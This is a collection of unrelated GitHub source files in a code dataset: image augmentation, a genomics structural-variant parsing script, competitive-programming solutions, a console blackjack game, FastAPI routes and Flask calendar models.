tf.adjust_saturation(img, saturation_factor)))\n\n if hue > 0:\n hue_factor = random.uniform(-hue, hue)\n transforms.append(Lambda(lambda img: tf.adjust_hue(img, hue_factor)))\n\n random.shuffle(transforms)\n transform = Compose(transforms)\n\n return transform\n\n def __call__(self, img, mask):\n \"\"\"\n Args:\n img (PIL Image): Input image.\n\n Returns:\n PIL Image: Color jittered image.\n \"\"\"\n transform = self.get_params(self.brightness, self.contrast,\n self.saturation, self.hue)\n return transform(img, mask)\n\n def __repr__(self):\n format_string = self.__class__.__name__ + '('\n format_string += 'brightness={0}'.format(self.brightness)\n format_string += ', contrast={0}'.format(self.contrast)\n format_string += ', saturation={0}'.format(self.saturation)\n format_string += ', hue={0})'.format(self.hue)\n return format_string\n\n'''\nif __name__ == '__main__':\n\n elastic = elastic_transform()\n img = Image.open('/home/xujl/data/gland/train/train_1.bmp')\n mask = Image.open('/home/xujl/data/gland/train_masks/train_anno_1.bmp')\n contour = Image.open('/home/xujl/data/gland/train_contour/train_anno_1.bmp')\n\n img2, mask2, contour2 = elastic(img, mask, contour)\n # img2 = elastic(img, mask, contour)\n\n plt.imshow(img)\n plt.show()\n\n plt.imshow(img2)\n plt.show()\n\n\n plt.imshow(np.array(mask))\n plt.show()\n\n\n plt.imshow(np.array(mask2))\n plt.show()\n\n plt.imshow(np.array(contour))\n plt.show()\n\n plt.imshow(np.array(contour2))\n plt.show()\n'''\n\n","repo_name":"klad2008/Google_ML_Winter_Camp_2020","sub_path":"segmentation-xujilan/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":28229,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"3403510525","text":"#!/usr/bin/env python\n\n# encoding: utf-8\n\n'''\n\n@author: Jiadong Lin, Xi'an Jiaotong Univeristy, Leiden University\n\n@contact: jiadong324@gmail.com\n\n@time: 2019/11/4\n'''\n\n\nimport sys\n\nfrom optparse import OptionParser\nimport pysam\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pylab as plt\nimport re\n\nparser = OptionParser()\nCHROMS = [\"chr1\", \"chr2\", \"chr3\", \"chr4\", \"chr5\", \"chr6\", \"chr7\", \"chr8\", \"chr9\", \"chr10\", \"chr11\", \"chr12\", \"chr13\", \"chr14\", \"chr15\", \"chr16\",\n \"chr17\", \"chr18\", \"chr19\", \"chr20\", \"chr21\", \"chr22\", \"chrX\"]\n\nclass Interval:\n def __init__(self, chrom, start, end, pattern, sample, interval_str):\n self.chrom = chrom\n self.start = 
start\n self.end = end\n self.pattern = pattern\n self.sample = sample\n self.interval = interval_str\n\n def overlap(self, interval, max_dist, len_prop):\n this_size = self.end - self.start\n inter_size = interval.end - interval.start\n\n min_len = this_size * len_prop\n max_len = this_size * (2 - len_prop)\n\n # Two intervals overlap\n if min(self.end, interval.end) >= max(self.start, interval.start) and self.chrom == interval.chrom:\n # Check breakpoint distance\n if abs(self.start - interval.start) <= max_dist and abs(self.end - interval.end) <= max_dist:\n # Check if SV size matches\n if inter_size >= min_len and inter_size <= max_len:\n return True\n\n return False\n\n def toString(self):\n\n out_str = \"{0}\\t{1}\\t{2}\\t\".format(self.chrom, self.start, self.end)\n interval_tokens = self.interval.split(\";\")\n sample_tokens = self.sample.split(\";\")\n\n sample_str = \"\"\n for i in range(len(sample_tokens)):\n sample_str += \"{0},{1};\".format(sample_tokens[i], interval_tokens[i])\n\n out_str += sample_str[:-1] + \"\\t\" + self.pattern\n\n return out_str\n\n\ndef mako_to_vcf(mako, out):\n '''\n Convert Mako raw output to standard VCF format\n :param mako:\n :param out:\n :param ref:\n :param sample:\n :return:\n '''\n\n print(\"Convert to VCF ...\")\n\n names = (\"chr\", \"start\", \"end\", \"type\", \"filter\", \"info\", \"pattern\", \"weight\")\n\n call_list = list()\n\n calls = pd.read_csv(mako, header=None, sep=\"\\t\", names=names)\n\n for idx, row in calls.iterrows():\n info_tokens = row[\"info\"].split(\";\")\n qual = info_tokens[0].split(\"=\")[1]\n brkp_str = \"\"\n supp_str = \"\"\n CR = 0\n for i in range(1, len(info_tokens)):\n info = info_tokens[i]\n if \"cr\" in info:\n CR = info.split(\"=\")[1]\n else:\n brkp_str += \"BRK{0}={1},{2};\".format(i, info.split(\",\")[0], info.split(\",\")[1])\n supp_str += \"SA{0}={1},RP{2}={3};\".format(i, info.split(\",\")[2].split(\"=\")[1], i, info.split(\",\")[3].split(\"=\")[1])\n\n supp_str += \"CR={0}\".format(CR)\n\n alt = \"\"\n if \",\" in row[\"type\"]:\n alt = \"\"\n svlen = int(row[\"end\"]) - int(row[\"start\"])\n\n vcf_info_str = \"END={0};SVLEN={1};SVTYPE={2};{3};{4};PATTERN={5};WEIGHT={6}\".format(row[\"end\"], svlen, row['type'], brkp_str[:-1], supp_str, row['pattern'], row['weight'])\n\n this_call = (row[\"chr\"], row[\"start\"], \"N\", alt, qual, row[\"filter\"], vcf_info_str)\n\n call_list.append(this_call)\n\n df_calls = pd.DataFrame(call_list, columns=[\"#CHROM\", \"POS\", \"REF\", \"ALT\", \"QUAL\", \"FILTER\", \"INFO\"])\n\n sorted_df_calls = df_calls.sort_values(['#CHROM', 'POS'], ascending=[True, True])\n\n with open(out, \"w\") as vcf:\n vcf.write(\"##fileformat=VCFv4.2\\n\")\n vcf.write(\"##source=Mako V1.0\\n\")\n vcf.write(\n '##REF=' + \"\\n\")\n vcf.write(\n '##ALT=, Description=\"Simple SV inferred from subgraph\">' + \"\\n\")\n vcf.write(\n '##ALT=, Description=\"Complex SV inferred from subgraph\">' + \"\\n\")\n vcf.write(\n '##QUAL=' + \"\\n\")\n vcf.write(\n '##FILTER=' + \"\\n\")\n vcf.write('##FILTER=' + \"\\n\")\n vcf.write('##FILTER=' + \"\\n\")\n vcf.write(\n '##FILTER=' + \"\\n\")\n vcf.write(\n '##INFO=' + \"\\n\")\n vcf.write(\n '##INFO=' + \"\\n\")\n vcf.write(\n '##INFO=' + \"\\n\")\n vcf.write(\n '##INFO=' + \"\\n\")\n vcf.write(\n '##INFO=' + \"\\n\")\n vcf.write(\n '##INFO=' + \"\\n\")\n\n sorted_df_calls.to_csv(vcf, sep=\"\\t\", index=False)\n\n\ndef merge_multiple_makos(sample_files, mako_dir, out_file, max_dist, len_prop):\n '''\n Merge multiple Mako call set\n :param 
sample_files:\n :param mako_dir:\n :param out_file:\n :param max_dist:\n :param len_prop:\n :return:\n '''\n\n intervals = []\n for line in open(sample_files, \"r\"):\n file_name = line.strip()\n mako_file_path = mako_dir + file_name\n sample_name = file_name.split(\".\")[0]\n\n cur_sample_sv_num = 0\n\n for line in open(mako_file_path, \"r\"):\n tmp = line.strip().split(\"\\t\")\n chrom = tmp[0]\n start = int(tmp[1])\n end = int(tmp[2])\n\n cur_sample_sv_num += 1\n sv_info_tokens = tmp[4].split(';')\n pattern_str = \"\"\n for token in sv_info_tokens:\n if token.split('=')[0] == 'Pattern':\n pattern_str = token.split('=')[1]\n break\n\n interval_str = \"{0},{1},{2}\".format(chrom, start, end)\n\n cur_interval = Interval(chrom, start, end, pattern_str, sample_name, interval_str)\n\n intervals = add_interval(intervals, cur_interval, max_dist, len_prop)\n\n # print sample_name + \", \" + str(cur_sample_sv_num) + \" SVs processed ..\"\n print(\"Merge sample: {0} total entries: {1}\".format(sample_name, len(intervals)))\n\n writer = open(out_file, \"w\")\n\n for interval in intervals:\n writer.write(interval.toString() + \"\\n\")\n writer.close()\n\n\ndef add_interval(intervals, new_interval, max_dist, len_prop):\n new_intervals = []\n\n num = len(intervals)\n\n if num == 0:\n new_intervals.append(new_interval)\n return new_intervals\n\n if new_interval.end < intervals[0].start or new_interval.start > intervals[num - 1].end:\n\n if new_interval.end < intervals[0].start:\n new_intervals.append(new_interval)\n\n new_intervals.extend(intervals)\n\n if new_interval.start > intervals[num - 1].end:\n new_intervals.append(new_interval)\n\n return new_intervals\n\n for i in range(len(intervals)):\n ele = intervals[i]\n overlap = ele.overlap(new_interval, max_dist, len_prop)\n # Overlapped\n if not overlap:\n new_intervals.append(ele)\n\n # check if given interval lies between two intervals\n if i < num and new_interval.start > intervals[i].end and new_interval.end < intervals[i + 1].start:\n new_intervals.append(new_interval)\n\n continue\n\n new_start = min(ele.start, new_interval.start)\n new_pattern = ele.pattern\n new_end = max(ele.end, new_interval.end)\n new_sample = ele.sample\n new_interval_str = ele.interval\n\n while i < num and overlap:\n new_end = max(intervals[i].end, new_interval.end)\n new_pattern += \";\" + new_interval.pattern\n new_sample += \";\" + new_interval.sample\n new_interval_str += \";\" + new_interval.interval\n if i == num - 1:\n overlap = False\n else:\n overlap = intervals[i + 1].overlap(new_interval, max_dist, len_prop)\n\n i += 1\n\n i -= 1\n\n new_intervals.append(\n Interval(new_interval.chrom, new_start, new_end, new_pattern, new_sample, new_interval_str))\n\n return new_intervals\n\n\ndef mako_filter(in_file, out_file, cxs, format):\n '''\n Filter mako raw call site with different evidence\n :param in_file:\n :param out_file:\n :return:\n '''\n writer = open(out_file, 'w')\n csvs_num = 0\n all_calls = 0\n for line in open(in_file, 'r'):\n if \"#\" in line:\n continue\n all_calls += 1\n tmp = line.strip().split(\"\\t\")\n cx_score = int(tmp[5].split(\";\")[0].split(\"=\")[1])\n # if cx_score not in scores:\n # scores.append(cx_score)\n if cx_score > cxs:\n csvs_num += 1\n if format == \"mako\":\n writer.write(line)\n elif format == \"bed\":\n sv_len = int(tmp[2]) - int(tmp[1])\n out_str = \"{0}\\t{1}\\t{2}\\t{3}\\n\".format(tmp[0], tmp[1], tmp[2], sv_len)\n writer.write(out_str)\n print(\"Number of calls after filtering: \", csvs_num)\n writer.close()\n # 
print(np.percentile(scores, 25))\n\ndef not_primary(aln):\n return aln.is_supplementary or aln.is_secondary\n\ndef classify_rps(bam, fai_file, min_mapq, min_insert, max_insert):\n seen_aln = {}\n npairs = 0\n genome_length = 0\n rp_type_dict = {}\n\n with open(fai_file, 'r') as f:\n for line in f:\n entries = line.strip().split(\"\\t\")\n chrom = entries[0]\n if \"chr\" not in chrom:\n chrom = \"chr{0}\".format(chrom)\n\n if chrom in CHROMS:\n genome_length += int(entries[1])\n print(\"Genome length: \", genome_length)\n\n for aln in bam.fetch(until_eof=True):\n if not_primary(aln) or aln.is_duplicate or aln.is_unmapped or aln.mate_is_unmapped:\n continue\n chrom = aln.reference_name\n if \"chr\" not in chrom:\n chrom = \"chr{0}\".format(chrom)\n\n if chrom not in CHROMS:\n continue\n\n if aln.qname not in seen_aln:\n seen_aln[aln.qname] = aln\n continue\n mate = seen_aln[aln.qname]\n npairs += 1\n del seen_aln[aln.qname]\n\n if npairs % 1000000 == 0:\n print(\"[bam summary] processed read-pairs: \", npairs)\n if aln.mapq < min_mapq or mate.mapq < min_mapq or aln.is_unmapped or \\\n mate.is_unmapped or not_primary(aln) or not_primary(mate):\n continue\n\n ilen = abs(aln.reference_start - mate.reference_end)\n sig_type = \"\"\n if aln.is_reverse != mate.is_reverse:\n second = aln if aln.is_reverse else mate\n first = aln if second is mate else mate\n if ilen > max_insert:\n sig_type = 'ARP_LARGE'\n\n elif (first.reference_start > second.reference_start) or \\\n (first.reference_end > second.reference_end):\n sig_type = 'ARP_RF'\n\n elif ilen < min_insert:\n sig_type = 'ARP_SMALL'\n else:\n sig_type = 'ARP_RR' if aln.is_reverse else \"ARP_FF\"\n\n if sig_type == \"\":\n continue\n\n if sig_type in rp_type_dict:\n rp_type_dict[sig_type] += 1\n else:\n rp_type_dict[sig_type] = 1\n\n return rp_type_dict, genome_length\n\n\ndef mako_config(bam, fai_file, num_to_check, min_mapq, out, sample):\n\n required = 97\n restricted = 3484\n flag_mask = required | restricted\n\n read_length = 0\n read_counter = 0\n\n L = []\n\n bam_file = pysam.AlignmentFile(bam, \"r\")\n\n for read in bam_file.fetch():\n if read_counter >= num_to_check:\n break\n\n cigar = read.cigarstring\n if cigar == None:\n continue\n\n read_length = get_read_length(cigar)\n flag = read.flag\n refname = read.reference_name\n mate_refname = read.next_reference_name\n isize = read.template_length\n\n valid = mate_refname == refname and flag & flag_mask == required and isize >= 0\n\n if valid:\n read_counter += 1\n L.append(isize)\n\n L = np.array(L)\n L.sort()\n med, umad = unscaled_upper_mad(L)\n upper_cutoff = med + 30 * umad\n L = L[L < upper_cutoff]\n\n mean = int(np.mean(L))\n stdev = int(np.std(L))\n\n min_insert = mean - 3 * stdev\n max_insert = mean + 3 * stdev\n\n print(\"mean: {0}\\tstd: {1}\\nStart to classify disocrdant read-pairs\".format(mean, stdev))\n\n rp_lambda, genome_length = classify_rps(bam_file, fai_file, min_mapq, min_insert, max_insert)\n\n out_str = \"mean:{0}\\nstdev:{1}\\nreadlen:{2}\\nworkDir:{3}\\nbam:{4}\\nname:{5}\\n\".format(mean, stdev, read_length, out, out + bam, sample)\n for rp_type, val in rp_lambda.items():\n out_str += \"{0}:{1}\\n\".format(rp_type, val / genome_length)\n\n print(\"All discordant read pairs processed!\")\n\n writer = open(out + sample + '.mako.cfg', 'w')\n writer.write(out_str)\n writer.close()\n\n\ndef unscaled_upper_mad(xs):\n \"\"\"Return a tuple consisting of the median of xs followed by the\n unscaled median absolute deviation of the values in xs that lie\n above the 
median.\n \"\"\"\n med = np.median(xs)\n return med, np.median(xs[xs > med] - med)\n\n\ndef get_read_length(cigar):\n cigarPattern = '([0-9]+[MIDNSHP])'\n cigarSearch = re.compile(cigarPattern)\n atomicCigarPattern = '([0-9]+)([MIDNSHP])'\n atomicCigarSearch = re.compile(atomicCigarPattern)\n\n readLen = 0\n if (cigar != '*'):\n cigarOpStrings = cigarSearch.findall(cigar)\n\n for opString in cigarOpStrings:\n cigarOpList = atomicCigarSearch.findall(opString)[0]\n readLen += int(cigarOpList[0])\n\n return readLen\n\ndef get_mako_sub(mako, out):\n\n ind_svs = []\n\n for line in open(mako, \"r\"):\n if \"#\" in line:\n continue\n\n tmp = line.strip().split(\"\\t\")\n chrom = tmp[0]\n\n sv_info = tmp[4]\n if \";;\" in sv_info:\n sv_info_tokens = sv_info.split(\";;\")\n for info_token in sv_info_tokens:\n tmp_token = info_token.split(\",\")\n if len(tmp_token) == 2 and \"-\" in tmp_token[0]:\n this_start = tmp_token[0].split(\"-\")[0]\n this_end = tmp_token[0].split(\"-\")[1]\n this_sv = (chrom, this_start, this_end, tmp_token[1])\n ind_svs.append(this_sv)\n else:\n for i in range(2, len(tmp_token)):\n token = tmp_token[i]\n if \"-\" in token:\n this_start = token.split(\"-\")[0]\n this_end = token.split(\"-\")[1]\n this_sv = (chrom, this_start, this_end, tmp_token[0] + \",\" + tmp_token[1] + \",\" + tmp_token[i + 1])\n ind_svs.append(this_sv)\n else:\n sv_info_tokens = sv_info.split(\",\")\n for i in range(2, len(sv_info_tokens)):\n token = sv_info_tokens[i]\n if \"-\" in token:\n this_start = token.split(\"-\")[0]\n this_end = token.split(\"-\")[1]\n this_sv = (chrom, this_start, this_end, sv_info_tokens[0] + \",\" + sv_info_tokens[1] + \",\" + sv_info_tokens[i + 1])\n ind_svs.append(this_sv)\n\n\n writer = open(out, \"w\")\n\n for sv in ind_svs:\n\n out_str = \"{0}\\t{1}\\t{2}\\t{3}\\n\".format(sv[0], sv[1], sv[2], sv[3])\n\n writer.write(out_str)\n\n writer.close()\n\nscript_name = sys.argv[0]\nif len(sys.argv) < 2:\n print('=======================================================')\n print('ParseMako.py Last Update:2020-7-20\\n')\n print('This script is used to process Mako raw callset\\n')\n print('Usage:')\n print('ParseMako.py [options] \\n')\n print('Options:')\n print('config: Create config file for Mako input ')\n print('filter: filter Mako calls ')\n print('tovcf: convert Mako calls to standard VCF format')\n # print('merge: merge mutiple Mako calls')\n\n print(\"=======================================================\")\nelse:\n option = sys.argv[1]\n\n if option == \"config\":\n parser.add_option(\"-b\", dest='bam', help='BAM file to config')\n parser.add_option(\"-n\", type=int, dest=\"num\", help=\"Number of samples used for estimation\")\n parser.add_option(\"-m\", type=int, dest=\"mapq\", help=\"Number of samples used for estimation\")\n parser.add_option(\"-f\", dest=\"fai\", help=\"Index of reference file\")\n parser.add_option(\"-w\", dest='out', help='Working directory')\n parser.add_option(\"-s\", dest=\"name\", help=\"Name of the sample\")\n\n (options, args) = parser.parse_args()\n mako_config(options.bam, options.fai, options.num, options.mapq, options.out, options.name)\n\n elif option == \"tovcf\":\n\n parser.add_option(\"-m\", dest=\"mako\")\n parser.add_option(\"-o\", dest=\"out\")\n (options, args) = parser.parse_args()\n\n if not options.mako:\n parser.error(\"Mako call not given\")\n\n if not options.out:\n parser.error(\"VCF output not given\")\n\n mako_to_vcf(options.mako, options.out)\n\n elif option == \"filter\":\n\n parser.add_option(\"-i\", dest=\"input\", 
help=\"Input Mako callset\")\n parser.add_option(\"-o\", dest=\"out\", help=\"Output of filtered Mako callset by CXS\")\n parser.add_option(\"-c\", type=int, dest=\"cxs\", help=\"CXS threshold\")\n parser.add_option(\"-f\", dest=\"format\", help=\"output format (original, bed)\")\n (options, args) = parser.parse_args()\n mako_filter(options.input, options.out, options.cxs, options.format)\n\n\n# if __name__ == '__main__':\n# bam_file = \"/Users/jiadonglin/Data/HG00733/HG00733.alt_bwamem_GRCh38DH.20150715.PUR.high_coverage.cram.bam\"\n# fai_file = \"/Users/jiadonglin/Data/ref_genome/GRCh38_full_analysis_set_plus_decoy_hla.fa.fai\"\n# bam_stats = \"/Users/jiadonglin/Data/HG00733/MakoV1/bam_summary.txt\"\n# classify_rps(bam_file, fai_file, 20, 101, 1037, bam_stats)\n\n\n\n\n\n","repo_name":"jiadong324/Mako","sub_path":"scripts/ParseMako.py","file_name":"ParseMako.py","file_ext":"py","file_size_in_byte":18857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"20205140237","text":"# https://www.acmicpc.net/problem/1080\nimport sys\ninput = sys.stdin.readline\n\nn, m = map(int, input().split())\nA = []\nB = []\ncnt = 0\n\nfor _ in range(n):\n A.append(list(map(int, input().strip())))\n\nfor _ in range(n):\n B.append(list(map(int, input().strip())))\n\ndef reverseNum(x, y):\n global cnt\n cnt += 1\n for i in range(x, x+3):\n for j in range(y, y+3):\n if A[i][j] == 0:\n A[i][j] = 1\n else:\n A[i][j] = 0\n\n\ndef solution():\n global cnt\n for i in range(n-2):\n for j in range(m-2):\n if A[i][j] != B[i][j]:\n reverseNum(i, j)\n\n for i in range(n):\n for j in range(m):\n if A[i][j] != B[i][j]:\n cnt = -1\n print(cnt)\n return\n\n print(cnt)\n\n\nsolution()","repo_name":"dlthgml1997/algorithm-sohee","sub_path":"DFS,BFS/1080:행렬.py","file_name":"1080:행렬.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33688469402","text":"import os\nimport random\ndef clear(): return os.system('cls')\n\n\nlogo = \"\"\"\n.------. _ _ _ _ _ \n|A_ _ |. | | | | | | (_) | | \n|( \\/ ).-----. | |__ | | __ _ ___| | ___ __ _ ___| | __\n| \\ /|K /\\ | | '_ \\| |/ _` |/ __| |/ / |/ _` |/ __| |/ /\n| \\/ | / \\ | | |_) | | (_| | (__| <| | (_| | (__| < \n`-----| \\ / | |_.__/|_|\\__,_|\\___|_|\\_\\ |\\__,_|\\___|_|\\_\\\\\n | \\/ K| _/ | \n `------' |__/ \n\"\"\"\ncards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]\n\nclear()\nprint(logo)\n\n\ndef deal_card():\n return random.choice(cards)\n\n\nuser_cards = []\ncomputer_cards = []\nis_game_done = False\n\n\ndef calculate_score(cards):\n\n if sum(cards) == 21 and len(cards) == 2:\n return 0\n\n if 11 in cards and sum(cards) > 21:\n cards.remove(11)\n cards.append(1)\n\n return sum(cards)\n\n\ndef compare(user_score, computer_score):\n if user_score == computer_score:\n return \"Draw\"\n elif computer_score == 0:\n return \"Computer has blackjack. You lose.\"\n elif user_score == 0:\n return \"You scored blackjack. 
You win\"\n elif user_score > 21:\n return \"You lose, you overflowed\"\n elif computer_score > 21:\n return \"You win, computer overflowed\"\n elif user_score > computer_score:\n return \"You win\"\n elif computer_score > user_score:\n return \"You lose\"\n\n\ndef show_cards(user_cards, computer_cards):\n print(\n f\"Your cards: {user_cards} total score : {calculate_score(user_cards)}\")\n print(f\"Computer's first card is: {computer_cards[0]}\")\n\n\ndef play():\n for i in range(2):\n user_cards.append(deal_card())\n computer_cards.append(deal_card())\n\n user_score = calculate_score(user_cards)\n computer_score = calculate_score(computer_cards)\n is_game_done = False\n\n while is_game_done == False:\n clear()\n show_cards(user_cards, computer_cards)\n if user_score == 0 or computer_score == 0 or user_score > 21 or computer_score > 21:\n is_game_done = True\n continue\n\n if input(\"Do you want another card? (y/n) \").lower() == \"y\":\n user_cards.append(deal_card())\n user_score = calculate_score(user_cards)\n if computer_score < 17:\n computer_cards.append(deal_card())\n computer_score = calculate_score(computer_cards)\n else:\n is_game_done = True\n\n while computer_score < 17:\n computer_cards.append(deal_card())\n computer_score = calculate_score(computer_cards)\n\n clear()\n print(f\"Your score: {user_score} Yourcards: {user_cards}\")\n print(\n f\"Computer's score: {computer_score} Computer's cards: {computer_cards}\")\n print(compare(user_score, computer_score))\n\n\nwhile input(\"Do you want to play a Blackjack Game ? (y/n) \").lower() == \"y\":\n user_cards = []\n computer_cards = []\n play()\n","repo_name":"pauldedward/100-Days-of-Code","sub_path":"Day-11/blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1241797100","text":"import sys\r\n\r\nimport numpy as np\r\n\r\nread = sys.stdin.buffer.read\r\nreadline = sys.stdin.buffer.readline\r\nreadlines = sys.stdin.buffer.readlines\r\n\r\ndef calc_div(N):\r\n sq = int(N**.5 + 10)\r\n x = np.arange(1, sq)\r\n x = x[N % x == 0]\r\n x = np.concatenate((x, N // x))\r\n return np.unique(x)\r\n\r\ndef inv_mod(a, mod):\r\n b, u, v = mod, 1, 0\r\n while b:\r\n t = a // b\r\n a, b = b, a - t * b\r\n u, v = v, u - t * v\r\n return u % mod\r\n\r\ndef main(N):\r\n N *= 2\r\n div = calc_div(N)\r\n for a in div:\r\n a = int(a)\r\n b = N // a\r\n if np.gcd(a, b) != 1:\r\n continue\r\n # b | an + 1\r\n n = (-inv_mod(a, b)) % b\r\n k = a * n\r\n if k == 0:\r\n k += N\r\n assert k * (k + 1) % N == 0\r\n yield k\r\n\r\nN = int(read())\r\nprint(min(main(N)))\n","repo_name":"kagemeka/atcoder-submissions","sub_path":"jp.atcoder/acl1/acl1_b/26707549.py","file_name":"26707549.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"4327138236","text":"from fastapi import APIRouter\n\nfrom models.student import Student\nfrom schemas import studentMapper\nfrom services import studentService\n\nstudent_router = APIRouter()\n\n\n@student_router.get('/students')\nasync def find_all_students():\n all_stud = studentService.get_all()\n return studentMapper.toListOfDTOs(all_stud)\n\n\n@student_router.post('/student')\nasync def create_student(student: Student):\n return studentService.save_student(dict(student))\n\n@student_router.delete('/student/{id}')\nasync def delete_student(id: str):\n 
studentService.delete_student(id)\n","repo_name":"2snufkin/farm_stack","sub_path":"routes/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"75437302910","text":"# Import the database object (db) from the main application module\n# We will define this inside /app/__init__.py in the next sections.\nimport calendar\nfrom datetime import date, datetime, timedelta\nfrom sqlalchemy import extract, and_\nfrom sqlalchemy.sql import func\nfrom app import db\nimport json\nfrom app.mod_base.base_model import Base\n\n# Define a User model\nclass Calendar(Base):\n __tablename__ = 'calendar'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(128), nullable=False)\n description = db.Column(db.String(256), nullable=False)\n min_year = db.Column(db.SmallInteger, nullable=False, default=2000)\n max_year = db.Column(db.SmallInteger, nullable=False, default=2200)\n time_zone = db.Column(db.String(128), nullable=False, default=\"Europe/Madrid\") \n week_starting_day = db.Column(db.SmallInteger, nullable=False, default=0) # 0: Monday, 6: Sunday\n emojis_enabled = db.Column(db.Boolean, nullable=False, default=True)\n auto_decorate_task_details_hyperlink = db.Column(db.Boolean, nullable=False, default=True)\n show_view_past_btn = db.Column(db.Boolean, nullable=False, default=True)\n hide_past_tasks = db.Column(db.Boolean, nullable=False, default=False)\n days_past_to_keep_hidden_tasks = db.Column(db.SmallInteger, nullable=False, default=62)\n # tasks = db.relationship(\n # 'Task',\n # backref='list',\n # lazy=True,\n # cascade='all, delete, delete-orphan',\n # passive_deletes=True,\n # single_parent=True\n # )\n\n def __init__(\n self,\n id=None,\n name=None,\n description=None,\n min_year=None,\n max_year=None,\n time_zone=None,\n week_starting_day=None,\n emojis_enabled=None,\n show_view_past_btn=None,\n auto_decorate_task_details_hyperlink=True,\n hide_past_tasks=False,\n days_past_to_keep_hidden_tasks=62\n ):\n self.id = id\n self.name = name\n self.description = description\n self.min_year = min_year\n self.max_year = max_year\n self.time_zone = time_zone \n self.week_starting_day = week_starting_day\n self.emojis_enabled = emojis_enabled\n self.show_view_past_btn = show_view_past_btn\n self.auto_decorate_task_details_hyperlink = auto_decorate_task_details_hyperlink\n self.hide_past_tasks = hide_past_tasks\n self.days_past_to_keep_hidden_tasks = days_past_to_keep_hidden_tasks\n\n @staticmethod\n def month_names():\n return [\n \"January\",\n \"February\",\n \"March\",\n \"April\",\n \"May\",\n \"June\",\n \"July\",\n \"August\",\n \"September\",\n \"October\",\n \"November\",\n \"December\",\n ]\n\n @staticmethod\n def month_name(month):\n return Calendar.month_names()[month - 1]\n\n @staticmethod\n def set_first_weekday(weekday):\n calendar.setfirstweekday(weekday)\n\n @staticmethod\n def weekdays(week_starting_day):\n weekdays_headers = [\"MON\", \"TUE\", \"WED\", \"THU\", \"FRI\", \"SAT\", \"SUN\"]\n ret = weekdays_headers[week_starting_day:] + weekdays_headers[0:week_starting_day]\n return ret\n\n @staticmethod\n def previous_month_and_year(year, month):\n previous_month_date = date(year, month, 1) - timedelta(days=2)\n return previous_month_date.month, previous_month_date.year\n\n @staticmethod\n def next_month_and_year(year, month):\n last_day_of_month = calendar.monthrange(year, month)[1]\n next_month_date = date(year, month, 
last_day_of_month) + timedelta(days=2)\n return next_month_date.month, next_month_date.year\n\n @staticmethod\n def current_date():\n today_date = datetime.date(datetime.now())\n return today_date.day, today_date.month, today_date.year\n\n @staticmethod\n def month_days(year, month):\n return calendar.Calendar(calendar.firstweekday()).itermonthdates(year, month)\n\n @staticmethod\n def month_days_with_weekday(year, month):\n return calendar.Calendar(calendar.firstweekday()).monthdayscalendar(year, month)\n\n '''\n insert()\n inserts a new model into a database\n the model must have a unique name\n the model must have a unique id or null id\n EXAMPLE\n drink = Drink(title=req_title, recipe=req_recipe)\n drink.insert()\n '''\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n '''\n delete()\n deletes a new model into a database\n the model must exist in the database\n EXAMPLE\n drink = Drink(title=req_title, recipe=req_recipe)\n drink.delete()\n '''\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n '''\n update()\n updates a new model into a database\n the model must exist in the database\n EXAMPLE\n drink = Drink.query.filter(Drink.id == id).one_or_none()\n drink.title = 'Black Coffee'\n drink.update()\n '''\n def update(self):\n db.session.commit()\n\nclass Task(Base):\n __tablename__ = 'task'\n\n id = db.Column(db.Integer, primary_key=True)\n calendar_id = db.Column(db.Integer, db.ForeignKey('calendar.id'), nullable=False)\n title = db.Column(db.String(128), nullable=False)\n color = db.Column(db.String(32), nullable=False)\n details = db.Column(db.String(256), nullable=False)\n start_time = db.Column(db.DateTime, nullable=False, default=func.current_timestamp())\n end_time = db.Column(db.DateTime, nullable=False, default=func.current_timestamp())\n is_all_day = db.Column(db.Boolean, nullable=False, default=False)\n is_recurrent = db.Column(db.Boolean, nullable=False, default=False)\n repetition_value = db.Column(db.SmallInteger, nullable=False, default=0)\n repetition_type = db.Column(db.String(1), nullable=False, default=\"\")\n repetition_subtype = db.Column(db.String(1), nullable=False, default=\"\")\n\n def __init__(\n self,\n calendar_id=None,\n title=None,\n color=None,\n details=None,\n start_time=None,\n end_time=None,\n is_all_day=None,\n is_recurrent=None,\n repetition_value=None,\n repetition_type=None,\n repetition_subtype=None\n ):\n self.calendar_id = calendar_id\n self.title = title\n self.color = color\n self.details = details\n self.start_time = start_time\n self.end_time = end_time\n self.is_all_day = is_all_day\n self.is_recurrent = is_recurrent\n self.repetition_value = repetition_value\n self.repetition_type = repetition_type\n self.repetition_subtype = repetition_subtype\n\n '''\n short()\n short form representation of the Task model\n '''\n def short(self):\n return {\n 'id': self.id,\n 'title': self.title,\n 'color': self.color,\n 'start_time': self.start_time.strftime(\"%d/%m/%Y, %H:%M:%S\"),\n 'end_time' : self.end_time.strftime(\"%d/%m/%Y, %H:%M:%S\")\n }\n\n '''\n long()\n long form representation of the Task model\n '''\n def long(self):\n return {\n 'id': self.id,\n 'calendar_id': self.calendar_id,\n 'title': self.title,\n 'color': self.color,\n 'details': self.details,\n 'start_time': self.start_time.strftime(\"%d/%m/%Y, %H:%M:%S\"),\n 'end_time': self.end_time.strftime(\"%d/%m/%Y, %H:%M:%S\"),\n 'is_all_day': self.is_all_day,\n 'is_recurrent': self.is_recurrent,\n 'repetition_value': self.repetition_value,\n 
